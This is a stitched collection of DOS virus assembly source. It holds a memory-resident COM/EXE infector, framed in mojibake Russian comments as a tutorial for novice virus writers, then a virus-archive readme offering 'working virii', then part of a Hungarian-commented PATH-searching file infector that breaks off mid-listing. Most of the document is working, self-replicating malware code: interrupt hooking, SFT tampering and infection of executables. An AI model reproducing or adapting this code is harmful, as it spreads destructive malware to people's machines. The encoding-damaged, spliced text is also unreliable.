;ç¥à⮢᪨ ¤®â®è­ë© AdInf -> ­ã ¨ çâ® ¦¥ ⥯¥àì?Œ-¤ ,⥯¥àì ᨤ¨¬ ¬ë â¥å­®ªàëáë
;¨ á⥭ ¥¬ ¯® ⥬ ¤®¡àë¬ ¢à¥¬¥­ ¬,ª®£¤  ã î§¥à  æ¥«ë© §®®¯ àª ­  ¬ è¨­¥ ¡¥£ «,
;  ®­ - ¡« ¦¥­ ¢ ­¥¢¥¤¥­¨¨,á«î­®î ¡à맦 ,¤®ª §ë¢ «,çâ® ­¥âã â ª¨å §¢¥à¥© ¢ RAM¥.
; € ⥯¥àì ¯®­ áâ ¢¨«¨ ¯à¨¬®ç¥ª ¢á直å - çãâì çâ®,áà §ã § ¢®¯ïâ!„ ¦¥ á⥫§ë
;¯à¨§ ¤ã¬ «¨áì : "€ 祣® íâ® ¬ë ᤥáì ⥫  ᢮¨ ᮪à뢠¥¬,¯àïç áì ª ª *beep ¢
;*beep".ˆ á â¥å ¯®à ¯®è¥« à §« ¤ ¢ á।¥ ‚¨à¬ ª®¢.Šâ® ¯à¥¤« £ ¥â àë«® ¢ § é¨é¥­-
;­ë© ०¨¬ áã­ãâì ¨ ⥬ á ¬ë¬ ¯®¤£«ï¤ë¢ ­¨¥ ¯à¨á¥çì,  ªâ® ¯® ¤®¡à®â¥ ¤ã襢­®©
;®¡¥é ¥â ¯à¨ ॠªæ¨¨ ¤¥â¥ªâ®à  ª ª®£®, «ì áâ®à®¦  ¢¥§¤¥áã饣®,¬ è¨­¥ ¢¨­â
;­  *beep ®¯ã᪠âì!® ¢á¥ íâ® ¯®«­ ï *beep­ï!®á«ã蠩⥠¡à âæë ‚¨à¬ ª¨ --
;­¥ ¢ â¨à ¦¥ áç áâì¥,  ¢ ªà á®â¥  «£®à¨â¬ !!!¥å © «®¢ïâáï ¢ è¨ §¢¥à¨ ¢á直¬¨
;ॢ¨§®à ¬¨,¯ãáâì ä®à¬ â¨â î§¥à ᢮¨ ¢¨­âë.Ž ç¥¬ ¡®«ìè¥ ­ á ⥬ ¬¥­ìè¥ î§¥à®¢!
;(ˆ¡® ¬­®£¨¥ ¨§ ­ á ¥é¥ ­¥ ¯®§ ¡ë«¨ Basic).€ «¥ç¨«ª¨ ¢á直¥ - ®­¨ ­ ¬ §¥¬«î
;à áç¨é îâ,¤«ï ­®¢ëå "¯®á ¤®ª"!
; ® ᨥ ¢á¥ 梥â®çª ¬¨ ®¡§ë¢ ¥âáï!€ ¢®â ¯à¥¤á⠢⥠ᥡ¥,çâ® á¬ëè«¥­­ë© ¬ «ë©
;¦¥« ¥â ­ ¯¨á âì ¯¥à¢®¥ ᢮¥ ¯à®¨§¢¥¤¥­¨¥,  ­¥â ã ­¥£® ­¨ ⥮ਨ ­¨ ¬ â¥àëå
;ª®à¥è¥©-‚¨à¬ ª®¢!‚®â ¨ ¯à¨è«®áì ¬­¥ á®áâ ¢«ïâì ¯®á®¡¨¥-¤«ï-­ ç¨­ îé¨å.
;ë« íâ® ¢¨àãá RCE-666 (¬­®î ¯¨á ­).Aidstest ¥£® ª«¨ç¥â: INFO /666,Web: Die-666.
;­® ¯®â®¬ ®¡à¥§ ¢ ¥£® ¬ «¥­ìª®,¯®«ã稫 ï RCE-385!
;  ¤¥îáì,çâ® Ž ¤«ï ­®¢¨çª®¢- ã祡­¨ª®¬ áâ ­¥â,  ¤«ï £®á¯®¤ « ¬¥à®¢ - ¤®á⮩-
;­ë¬ ¯®«¨£®­®¬!
;-----------------------------------------------------------------------------
;(c) Light General.Kiev.1995. STEALTH group . For free use!
;-----------------------------------------------------------------------------
cseg segment
assume cs:cseg,ds:cseg
org 100h
start:
nop ; ਧ­ ª § à ¦¥­¨ï .COM ä ©« .
jmp virr
; Ÿª®¡ë § à ¦¥­­ ï ¯à®£à ¬¬ .(‡ ­¨¬ ¥â 30 ¡ ©â).
nop
nop
mov ah,09
lea dx,wrn
int 21h
mov ax,4c00h
int 21h
;--------------------------------------
wrn db 'FRODO LIVES!$'
;--------------------------------------
;################# VIRUS ##################
virr:
call $+3
pop si
sub si,03
;-Hacked mem.-----------------------------------------------------
push si
clc
mov ax,0FEFEh ; ஢¥à塞 ¯ ¬ïâì ­  § à ¦¥­­®áâì!
int 21h ; Š®«¨ ¢¨àãá “†… ᨤ¨â ¢ ¬ è¨­¥ â® ®­
jc exit_v ; ¯®¤­¨¬¥â ä« £ CF!
;- ‘«¥¤ãîé ï ç áâì ª®¤  ¯à®¨§¢®¤¨â "®âªãá뢠­¨¥" 512 ¡ ©â ¯ ¬ïâ¨!-------------
; ਭ樯 í⮣® "®âªãá뢠­¨ï" ®á­®¢ë¢ ¥âáï ­  ⮬,çâ® ¯à¨ ¢ë¯®«­¥­¨¨ ¯à®£à ¬¬ë
;á¨á⥬  áâந⠯¥à¥¤ ¥¥ ª®¤®¬ â ª¨¥ ¡«®ª¨ (®¡à â¨â¥ ¢­¨¬ ­¨¥ ­  ¢ë¤¥«¥­­ë¥
;ç áâ¨)
;---(1)--- MCB - Memory Control Block («®ª ã¯à ¢«¥­¨ï ¯ ¬ïâìî)
; Ž¡ëç­® ¢ â ª¨å ¡«®ª å DOS ®¯¨á뢠¥â ¢ë¤¥«¥­­ë¥ ¯à®£à ¬¬ ¬ ãç á⪨ ¯ ¬ïâ¨!
; ”ŽŒ€’ :
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘¬¥é¥­¨¥ ï祩ª¨ ®â ³ „«¨­  ³  §­ ç¥­¨¥
; ­ ç «  ¡«®ª . ³ ³
; ³ ³
; 00 ³ 1b ³ …᫨ á⮨â 'M' â® íâ®â ¡«®ª ­¥ ¯®á«¥¤­¨©
; ³ ³ 'Z' ¯®á«¥¤­¨©.
; 01 ³ 1w ³ ‘¥£¬¥­â­ë©  ¤à¥á (á ª®â®à®£® ¢ë¤¥«¥­ ¡«®ª).
;++++> 03 ³ 1w ³ „«¨­  ¡«®ª  ¢ ¯ à £à ä å (¯ à £à ä = 16 ¡ ©â)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;„ «ìè¥ ¨¤ãâ ¥é¥ ¤ ­­ë¥,­® ­ á ¨­â¥à¥áã¥â ⮫쪮 íâ®! ÄÄÄÄÄÄÄÄÄÄÄÄ
;
;---(2)--- PSP - Program Segment Prefix (à¥ä¨ªá ¯à®£à ¬¬­®£® ᥣ¬¥­â )
; ‘¤¥áì ᮤ¥à¦¨âáï ¨­ä®à¬ æ¨ï ¤«ï § ¯ã᪠¥¬®© ¯à®£à ¬¬ë!
; ”ŽŒ€’ :
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘¬¥é¥­¨¥ ï祩ª¨ ®â ³ „«¨­  ³  §­ ç¥­¨¥
; ­ ç «  ¡«®ª . ³ ³
; ³ ³
; 00 ³ 1w ³ ‚ í⮬ á«®¢¥ á⮨⠪®¬ ­¤  int 20h (CD 20h)
;++++> 02 ³ 1w ³ ޡ鍩 à §¬¥à ¯ ¬ï⨠¢ë¤¥«¥­­ë© ¯à®£à ¬¬¥!
; ³ ³ (ਠ§ ¯ã᪥ ¯à®£à ¬¬ë DOS ¢ë¤¥«ï¥â ¥© ¢áî
; ³ ³ ¯ ¬ïâì "¤® ª®­æ " 640 ª¨«®¡ ©â!)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;„ «ìè¥ ¨¤ãâ ­¥ ¨­â¥à¥áãî騥 ­ á ¤ ­­ë¥! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;-- ’ ª ¢®â,®â­¨¬ ï ­¥ª®â®à®¥ §­ ç¥­¨¥ ®â ¢ë¤¥«¥­­ëå ï祥ª,¬ë ¬®¦¥¬ ᤥ« âì
;"¤ëàªã" ¢ áâ àè¨å  ¤à¥á å ¯ ¬ï⨠¨ ¯¥à¥­¥á⨠â㤠 ⥫® ¢¨àãá !
; à ªâ¨ç¥áª ï ॠ«¨§ æ¨ï :
mov ax,ds
dec ax
mov es,ax
sub word ptr es:[03],35 ;* 512b
sub word ptr ds:[02],35 ;* 512b
mov es,ds:[02] ; ES = ᥣ¬¥­â­.  ¤à. "®âªãè." ¯ ¬ïâ¨!
push ds cs
pop ds
xor di,di
mov cx,offset ax_len-offset virr ; „«¨­  ¢¨àãá !
rep movsb ; ¥à¥­®á¨¬ ¢¨àãá ¢ "®âª." ¯ ¬ïâì!
;-Install int.----------------------------------------------------
mov al,21h
mov dx,offset int_21h_entry-offset virr
mov si,offset ofs_21h-offset virr
push es
pop ds
call inst_int ; “áâ ­®¢¨¬  ¤à¥á int 21h ­  ᢮©
; ®¡à ¡®â稪.
pop ds
exit_v:
push ds
pop es
pop si
;- COM or EXE ?---------------------------------------------------
; ஢¥à¨¬ ¨§ ª ª®£® ä ©«  ¬ë áâ à⮢ «¨?
; â® ¤¥« ¥âáï ¯®â®¬ã,çâ® ¯¥à¥¤ ç  ã¯à ¢«¥­¨ï .COM ¨«¨ .EXE ¯à®£à ¬¬¥
; ¯à®¨á室¨â ¯® à §­®¬ã!
cmp byte ptr cs:[si+offset origin_2_byte-offset virr+1],'Z'
jz L_exe
;-‚ocáâ ­®¢¨âì âਠ¡ ©â  ‡..-------------------------------------
; “ .COM ä ©«  ­ ¤®¡­® ¢®ááâ ­®¢¨âì ç¥âëॠ¯¥à¢ëå ¡ ©â  ª®â®àë¥ ¬ë ¨§¬¥­¨«¨
; ¯à¨ § à ¦¥­¨ï ä ©«  ­  ¤¨áª¥!(Œë § ¯¨á «¨ â㤠 ª®¬ ­¤ã ¯¥à¥å®¤  ­  ¢¨àãá).
mov di,100h
add si,offset origin_2_byte-offset virr
; SI =  ¤à¥á ¡ãä¥à  á ®à¨£¨­ «ì­ë¬¨ ¡ ©â ¬¨ .COM ä ©« !
push di
movsw
movsw
xor ax,ax
ret ; Go to infected com program.
;-Loaded from exe file.--------------------------------------------
; € ¢®â í⮠ᯮᮡ  ªâ¨¢ æ¨¨ .EXE ¯à®£à ¬¬ë!
; ‘¤¥áì ¯à®¨á室¨â ¢á¥ ¨­ ç¥ : â.ª. ¯à¨ § à ¦¥­¨¨ ä ©«  ¬ë ¨§¬¥­¨«¨ ¢ ­¥¬
; § £®«®¢®ª ª®â®àë© ãª §ë¢ ¥â á ª ª®£®  ¤à¥á  íâ®â ä ©« § ¯ã᪠îâ!
; (Šâ® ­¥ §­ ¥â,çâ® â ª®¥ § £®«®¢®ª .EXE ä ©«  ¯ãáâì ®¡à â¨âáï ª ª­¨£¥ .€¡¥«ï
; "Ÿ§ëª €áᥬ¡«¥à  ¤«ï IBM PC ¨ ¯à®£à ¬¬¨à®¢ ­¨ï" (áâà. 362)
L_exe:
mov ax,es
add ax,10h
add cs:[offset CS_file-offset virr][si],ax
; ’ ª ¬ë ¢ëç¨á«¨«¨ ᥣ¬¥­â ¢ ª®â®àë© ­ ¤® ¯¥à¥¤ âì ã¯à ¢«¥­¨¥!
db 0eah ;-
IP_file dw ? ;- JMP Far CS_file:IP_file
CS_file dw ? ;-
;------------------------------------------------------------------
; € í⮠ᮡá⢥­­® ç áâì ®â¢¥ç îé ï §  § à ¦¥­¨¥ ¯à®£à ¬¬!
int_21h_entry proc
cmp ax,0FEFEh ;-…᫨ ᮡà â á¯à è¨¢ ¥â ® ­ «¨ç¨¨
jnz _@1 ;-᢮¥© த­¨ â® ¤ âì ¤à㦥᪨© ®â¢¥â.
stc ;-
int_24h_entry:
mov al,03
retf 2
_@1:
cmp ax,4b00h ; …᫨ DOS ¯ëâ ¥âáï ¢ë¯®«­¨âì ¯à®£à ¬¬ã
jnz exit_all ; â® ¬ë § à ¦ ¥¬ ¥¥!
jmp infecting ;
exit_date:
mov ax,5701h ; “áâ ­®¢ª  áâ à®© ¤ âë ä ©« .
mov cx,es:[di+13] ;<- Time
mov dx,es:[di+15] ;<- Date
int 21h
exit_close:
mov ah,3eh ; ¥à¥¤ ¯¥à¥¤ ç¥© ã¯à ¢«¥­¨ï DOS'ã -
int 21h ; § ªà®¥¬ ä ©« ª®â®àë© § à ¦ «¨!
exit_pop:
lds dx,cs:[offset ofs_24h-offset virr]
mov ax,2524h ; “áâ ­®¢¨¬ ­  ¬¥áâ® int 24h
int 21h
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
exit_all:
db 0eah
ofs_21h dw 0000
seg_21h dw 0000
int_21h_entry endp
;-------------------------------------------------------------------
infecting:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp
push ds
push dx
;------------------------------------------------------------------
; ¥à¥áâ ¢¨¬  ¤à¥á ¢¥ªâ®à  int 24h ­  ­ è ®¡à ¡®â稪 - â.¥. ­  ¯à®áâãî
; § £«ãèªã,ª®â®à ï ¢ á«ãç ¥ "§ ª«¥¥­®©" ¤¨áª¥âë ­¥ ¯®§¢®«¨â DOS'ã ªà¨ç âì :
; Write protect error ...
mov al,24h
mov si,offset ofs_24h-offset virr
mov dx,offset int_24h_entry-offset virr
call inst_int
pop dx
pop ds
;-Open file...-----------------------------------------------------
mov ax,3d00h
int 21h
jc exit_pop
;-Read header (EXE) or first 4 byte (COM).-------------------------
mov bh,3fh
xchg ax,bx
mov cx,18h
push cs
pop ds
mov dx,offset origin_2_byte-offset virr
mov si,dx
int 21h ; ‘ç¨â뢠¥¬ ¢ ¡ãä¥à 24 ¯¥à¢ëå ¡ ©â  ¯à®£à ¬¬ë!
_1:
jc exit_close ; …᫨ ®è¨¡ª ,â® § ªà®¥¬ ä ©« ¨ ¢ë©¤¥¬.
;-Look SFT file!-----------------------------
; ‘®¡á⢥­­® £®¢®àï, ¤ «¥¥ ¨¤¥â "¨§î¬¨­ª " ¢¨àãá  - ¨§-§  ­¥¥ ®­ ¨¬¥¥â â ª¨¥
;¬ «ë¥ à §¬¥àë!ˆ â ª,çâ® ¦¥ íâ® :
; ˆ§¢®«¨â¥ «¨ ¢¨¤¥âì ï ¢¥á쬠 «¥­¨¢,¨ ­¥ ®ç¥­ì «î¡«î ¢®§¨âáï á â ª¨¬¨
; àã⨭ ¬¨ ª ª á­ï⨥ ¨ ãáâ ­®¢ª   âਡã⮢,¯¥à¥¬¥é¥­¨¥ ä ©«®¢®£® 㪠§ â¥«ï!
; € ¯®á¥¬ã à áª®¯ « ï ¢­ãâ७­îî ¯®¤à®¡­®áâì DOS' !
; (Ž­  㯮¬¨­ ¥âáï ¢ à ¡®â¥ Š.ƒ.”¨­®£¥­®¢  "‘ ¬®ãç¨â¥«ì ¯® á¨á⥬­ë¬ äã­ªæ¨ï¬
; MS-DOS" (áâà. 67) (  â ª ¦¥ ¢ í«¥ªâà®­­®¬ á¯à ¢®ç­¨ª¥ Help PC)
; (‚¯¥à¢ë¥ ¯à¨¬¥­¥­® ¢ RC-0-512 (666,Written by Dark Avenger.)
; â® SFT -- System File Table - (‘¨á⥬­ ï â ¡«¨æ  ®âªàëâëå ä ©«®¢.)
;Ž­  á®§¤ ¥âáï ¤«ï ¢­®¢ì ®âªà뢠¥¬®£® ä ©«  ¨ ᮤ¥à¦¨â ¨­ä®à¬ æ¨î ¨á¯®«ì§ã¥¬ãî
;­¥¯®á।á⢥­­® ¯à®æ¥¤ãà ¬¨ § ¯¨á¨/áç¨â뢠­¨ï DOS' !!!
;
; ”ŽŒ€’ :
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘¬¥é¥­¨¥ ï祩ª¨ ®â ³ „«¨­  ³  §­ ç¥­¨¥
; ­ ç «  ¡«®ª .(„¥á.) ³ ³
; ³ ³
; 00 ³ 1w ³ Š®«-¢® ¤¥áªà¨¯â®à®¢ § ªà¥¯«¥­­ëå §  ä ©«®¬
; 02 ³ 1b ³ ¥¦¨¬ ¤®áâ㯠 § ¤ ­­ë© ¯à¨ ¥£® ®âªàë⨨
; 04 ³ 1b ³ €âਡãâë ä ©« 
; 11 ³ 1w ³ ®¬¥à ¯¥à¢®£® ª« áâ¥à  ä ©« 
; 13 ³ 1w ³ ‚à¥¬ï ¯®á«¥¤­¥© ¬®¤¨ä¨ª æ¨¨ ä ©« 
; 15 ³ 1w ³ „ â  ...
; 17 ³ 2w ³ „«¨­  ä ©« 
; 21 ³ 2w ³ “ª § â¥«ì ¢ ä ©«¥
; 32 ³ 11b ³ ˆ¬ï ¨ à áè¨à¥­¨¥ ä ©«  (¡¥§ '.')
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov ax,1220h ; ‘¥© ãç áâ®ç¥ª ª®¤  ¯®§¢®«ï¥â
push bx ; ¯®«ãç¨âì  ¤à¥á SFT ¢ ¯ à¥ ES:DI
int 2fh ;
mov bl,es:[di] ;
mov ax,1216h ;
int 2fh ;
pop bx ;
mov byte ptr es:[di+2],02 ; ‚ˆŒ€ˆ…!⨬ ¤¥©á⢨¥¬ ¬ë
;ᤥ« «¨ â ª,ç⮠⥯¥àì DOS
;áç¨â ¥â,çâ® ä ©« ®âªàëâ ¤«ï
;§ ¯¨á¨/áç¨â뢠­¨ï!
; ’.¥. ­ ¬ ­¥ ¯®­ ¤®¡¨«®áì
;á­¨¬ âì  âਡãâë ä ©« !
mov bp,es:[di+17] ; BP = file len!
;---------------------------------------------
; ’¥¯¥àì ¯à®¢¥à塞 ¡ ©âë ª®â®àë¥ áç¨â «¨ ¢ ¡ãä¥à.
lodsb
dec si
cmp al,'M' ; MZ - ¯à¨§­ ª ⮣®,çâ® íâ® .EXE ä ©«!
jz _EXE
cmp al,90h ; NOP - ¥á«¨ íâ® .COM ä ©« â® ¯à®¢¥à¨¬ ¥£® ­ 
; ¯®¢â®à­ãî § à ¦¥­­®áâì!(‘¬®âà¨â¥ ¢ ­ ç «®)
_1d:
jz exit_close
;-Infect .COM --------------------------------
; ’ ª § à ¦ îâ .COM ä ©«ë!
xchg ax,bp
cmp ax,65000
ja exit_close ;„«¨­  ¡®«ìè¥ ¤®¯ãá⨬®©.
mov es:[di+21],ax ;‘â ¢¨¬ ä ©«®¢ë© 㪠§ â¥«ì ¢
;ª®­¥æ ä ©« !
;-Make JMP------------------------------------
; ’.ª. ¯à¨ § à ¦¥­¨¨ ¬ë ¢¯¨á뢠¥¬ ¢ ­ ç «® .COM ä ©«  ¯¥à¥å®¤ ­  ⥫® ¢¨àãá  â®
;¬ë ¤®«¦­ë ¢ëç¨á«¨âì ᬥ饭¨¥ í⮣® ¯¥à¥å®¤ !
sub ax,04
mov ds:[offset jmp_n-offset virr],ax
call write_virus ; ¨è¥¬ ¢¨àãá ¢ ª®­¥æ ä ©« !
mov cx,04h ; € ⥯¥àì ¯¨è¥¬ ¢ ­ ç «® ä ©«  â®â á ¬ë©
mov dx,offset new_3_byte-offset virr ; ¯¥à¥å®¤!
exit_write:
mov ah,40h
int 21h
_1b: jmp exit_date
;-Sub. for write virus body (only) in file.----
write_virus proc
xor dx,dx
mov ah,40h
mov cx,offset ax_len-offset virr
int 21h
mov es:[di+21],dx ; F.P = start file!
mov es:[di+23],dx
cmp ax,cx
jnz _1c
ret
_1c:
pop ax
jmp _1b ; exit_date!
write_virus endp
;-Infect .EXE ---------------------------------
_EXE:
; € ⥯¥àì ¢ëáç¨â ¥¬ ¤«¨­ã ä ©« , ¨áå®¤ï ¨§ ¤ ­­ëå § ¯¨á ­­ëå ¢ § £®«®¢ª¥
; .EXE ä ©« ! ˆ ¥á«¨ ®­  ­¥ ᮩ¤¥âáï á § ¯¨á ­®© ¢ SFT, â® ¬ë áç¨â ¥¬,çâ®
; íâ® ä ©«, ᮤ¥à¦ é¨© ­¥ï¢­ë© ®¢¥à«¥© ¨ ­¥ § à ¦ ¥¬ ¥£®!
mov ax,ds:[si+4] ; Pages (512b).
dec ax
mov cx,512
mul cx
add ax,[si+2] ; AX = File len from header.
cmp ax,bp ; Real file len = ax ?
jnz _1b ; No - this is overlay.
;-----
mov es:[di+21],ax ; “ª § â¥«ì ¢ ª®­¥æ ä ©« .
mov es:[di+23],dx
;-Get header.-----------------------------------
; ‡ ¯®¬¨­ ¥¬  ¤à¥á á ª®â®à®£® ¬ë ¡ã¤¥¬ § ¯ã᪠âì .EXE ¯à®£à ¬¬ã!
mov ax,[si+14h]
mov ds:[offset IP_file-offset virr],ax
mov ax,[si+16h]
mov ds:[offset CS_file-offset virr],ax
;-----------------------------------------------
; ‚ëç¨á«¨¬ ­®¢ë©  ¤à¥á (â.¥. ¤«ï § ¯ã᪠ ¢¨àãá  ¯à¨ áâ à⥠¯à®£à ¬¬ë)
xchg ax,bp
mov cx,10h
div cx
sub ax,[si+8]
sbb dx,0
mov [si+16h],ax ; ReloCS.
mov [si+14h],dx ; ExeIP.
;-Correcting file len in header.----------------
;’¥¯¥àì ®âª®à४â¨à㥬 ¤«¨­ã ¢ § £®«®¢ª¥ .EXE ä ©« !
;(…„“…†„€ž!„«¨­  ¢¨àãá  = 385 ,  ¬ë 㢥«¨ç¨¢ ¥¬ ¤«¨­ã ä ©«  ¢ § £®«®¢ª¥
; ­¥ ­  385 ,  ­  512!!!’.¥. ⥯¥àì ¤à㣨¥ "ã¬­ë¥ ¢¨àãáë" ­¥ ¡ã¤ãâ § à ¦ âì
; íâ®â ä ©«).‘®¡á⢥­­® £®¢®àï íâ  ®á®¡¥­­®áâì ï¥âáï ¯à¨§­ ª®¬ § à ¦¥­¨ï,-
; ¬ë ¢¥¤ì ­¥ § à ¦ ¥¬ ®¢¥à«¥¨!
inc word ptr ds:[si+4]
;-Write virus to file.--------------------------
call write_virus
;-Write new header.-----------------------------
mov cx,18h
mov dx,si ; DX = offset header.
jmp exit_write ; ®¤£®â®¢¨¢ ¢á¥ ª § ¯¨á¨ ¨á¯à ¢«¥­­®£®
;§ £®«®¢ª  ¬ë ¯¥à¥¤ ¥¬ ã¯à ¢«¥­¨¥ ¯àאַ
;­  ª®¬ ­¤ã int 21h!
;----------------------------------------------
inst_int proc
mov ah,35h
int 21h
mov ds:[si],bx
mov ds:[si+2],es
mov ah,25h
int 21h
ret
inst_int endp
new_3_byte db 90h ; NOP
db 0e9h ; JMP nn
jmp_n dw 0000 ; nn
;-Header for EXE file & buffer for first 5 bytes COM's file.--
origin_2_byte:
header:
db 4 dup (90h) ; NOPs
ax_len db ?
db 20h dup (?) ; For EXE header.
ofs_24h dw ?
seg_24h dw ?
;********************************************************
cseg ends
end start
;-- Written by Light General.Kiev.1995.For free use! ----
@@ -0,0 +1,19 @@
Rhys' Virii Archives:
~~~~~~~~~~~~~~~~~~~~~~~
This is one of many ZIP archive files that, all together, contain
literally thousands of working, running virii. Enjoy.
Please note that I have safely kept these on my hard drive as
uncompressed program files and have yet to be infected by one
of these.
All you must do to avoid infection is make sure that no idiot
runs these.
These virii are for educational uses only. I will not be
responsible for what you do with these.
Once again, Enjoy!
-Rhys
@@ -0,0 +1,230 @@
PAGE ,132
VIRUS SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:VIRUS,DS:VIRUS
HOSSZ EQU VEG-KEZDET
KEZDET EQU $
INDIT: PUSH CX
TBLC: MOV DX,OFFSET TABL
CLD ; SZTRINGMUVELETEK NOVEKVO IRANYBA
MOV SI,DX ; SI TARTALMAZZA A TABLAZAT KEZDOCIMET
ADD SI,OFFSET FILKEZ-TABL
MOV DI,100H ; AZ ELSO HAROM BYTE VISSZAALLITASA
MOV CX,3
REPZ MOVSB
MOV SI,DX ; SI-BE ISMET A TABLAZAT KEZDOCIME
MOV AH,30H ; A DOS VERZIOSZAM LEKERDEZESE
INT 21H
CMP AL,0 ; MEG AZ 1.X VERZIO?
JNZ IND1 ; NEM
JMP IND2 ; IGEN, A VIRUS NEM TUD TERJEDNI
IND1: PUSH ES ; ES ELMENTESE
MOV AH,2FH ; A DTA CIMENEK LEKERDEZESE
INT 21H ; ES ELTAROLASA A TABLAZATBAN
MOV WORD PTR [SI+DTACIM-TABL],BX
MOV WORD PTR [SI+DTACIM-TABL+2],ES
POP ES ; ES VISSZAOLVASASA
MOV DX,UJDTA-TABL
ADD DX,SI ; A DTA UJ CIMENEK BEALLITASA
MOV AH,1AH
INT 21H
PUSH ES ; REGISZTEREK ELMENTESE
PUSH SI
MOV ES,DS:2CH ; A DOS KORNYEZET CIME
MOV DI,0 ; ELEJETOL
IND3: POP SI ; SI VISSZAOLVASASA
PUSH SI ; ES VISSZAIRASA
ADD SI,OFFSET SZOVEG-TABL
LODSB ; EGY KARAKTER BETOLTESE
MOV CX,8000H ; A KORNYEZET MAX. 32K
REPNZ SCASB ; AZ ELSO KARAKTER KERESESE
MOV CX,OFFSET FSPEC-SZOVEG-1
IND4: LODSB ; A KOVETKEZO KARAKTER BEOLVASASA
SCASB ; ES ELLENORZESE
JNZ IND3 ; NEM EGYEZIK
LOOP IND4 ; FOLYTATNI
POP SI ; A REGISZTEREK VISSZAALLITASA
POP ES
MOV [SI+UTCIM-TABL],DI
MOV DI,SI ; DI-BE A TABLAZAT KEZDOCIME
ADD DI,OFFSET FSPEC-TABL
MOV BX,SI ; SI ELMENTESE BX-BE
ADD SI,OFFSET FSPEC-TABL
MOV DI,SI
JMP SHORT IND5 ; KERESES ELOSZOR AZ AKTUALIS ALKONYVTARBAN
INDE: CMP WORD PTR [SI+UTCIM-TABL],0
JNZ IND6 ; VAN MEG TOBB UT
JMP IND7 ; MINDEN LEHETSEGES FILE FERTOZOTT
IND6: PUSH DS ; A REGISZTEREK ELMENTESE
PUSH SI
MOV DS,ES:2CH ; DS-BE A DOS KORNYEZET SZEGMENSE
MOV DI,SI ; DI A TABLAZATRA MUTAT
MOV SI,WORD PTR ES:[DI+UTCIM-TABL]
ADD DI,OFFSET FSPEC-TABL
IND8: LODSB ; EGY KARAKTER BETOLTESE
CMP AL,3BH ; ';' AZ UTAKAT VALASZTJA EL
JZ IND9 ; ANNAK A KODJA
CMP AL,0 ; A LEZARO NULLA?
JZ INDA ; AZ A KOD
STOSB ; ELTAROLAS
JMP SHORT IND8 ; FOLYTATNI
INDA: MOV SI,0 ; TOBB UT NEM LETEZIK
IND9: POP BX ; BX A TABLAZAT KEZDOCIME
POP DS ; DS VISSZAALLITASA
MOV [BX+UTCIM-TABL],SI
CMP BYTE PTR [DI-1],5CH ; A FILE SPECIFIKACIO '\' LETT LEZARVA?
JZ IND5 ; IGEN
MOV AL,5CH ; A '\' KODJA
STOSB ; ELTAROLASA
IND5: MOV [BX+FAKT-TABL],DI
MOV SI,BX ; A TABLAZAT KEZDOCIME BX
ADD SI,OFFSET FKER-TABL ; KERESO NEV
MOV CX,OFFSET UTCIM-FKER
REPZ MOVSB ; ATMASOLASA A FILE SPECIFIKACIOBA
MOV SI,BX ; SI A TABLAZAT KEZDOCIME
MOV AH,4EH ; FILE KERESESE
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
MOV CX,11B ; A KERESETT ATTRIBUTUM
INT 21H
JMP SHORT INDC ; A KOVETKEZO RESZT ATUGRANI
INDF: MOV AH,4FH ; A KOVETKEZO FILENEV KERESESE
INT 21H
INDC: JNC INDD ; MEGTALALTUK
JMP INDE ; NINCS ITT TOBB HASONLO
INDD: MOV AX,[SI+UJDTA-TABL+22]
AND AL,11111B ; A LETREHOZAS IDEJENEK MASZKOLJUK A MASODPERCEIT
CMP AL,11111B ; 62 MASODPERC? /FERTOZEST EZZEL JELZI/
JZ INDF ; IGEN, TOVABB KELL KERESNI
CMP WORD PTR [SI+UJDTA-TABL+26],0FA00H
JA INDF ; TUL NAGY FILE, NEM FERTOZHETO
CMP WORD PTR [SI+UJDTA-TABL+26],0AH
JB INDF ; TUL KICSI FILE
MOV DI,[SI+FAKT-TABL]
PUSH SI ; A TABLAZAT KEZDOCIMENEK ELMENTESE
ADD SI,OFFSET UJDTA-TABL+30
INDG: LODSB ; A FILENEV ATMASOLASA A FILE SPECIFIKACIOBA
STOSB
CMP AL,0 ; A NEV ZARO NULLA?
JNZ INDG ; NEM, FOLYTATNI
POP SI ; A TABLAZAT KEZDOCIMENEK VISSZAALLITASA
MOV AX,4300H ; A FILE ATTRIBUTUM BEOLVASASA
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
MOV [SI+FILATT-TABL],CX
MOV AX,4301H ; A FILE ATTRIBUTUM BEALLITASA
DB 81H,0E1H,0FEH,0FFH ; AZ R/O BIT TORLESE
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
MOV AX,3D02H ; A FILE MEGNYITASA IRASRA & OLVASASRA
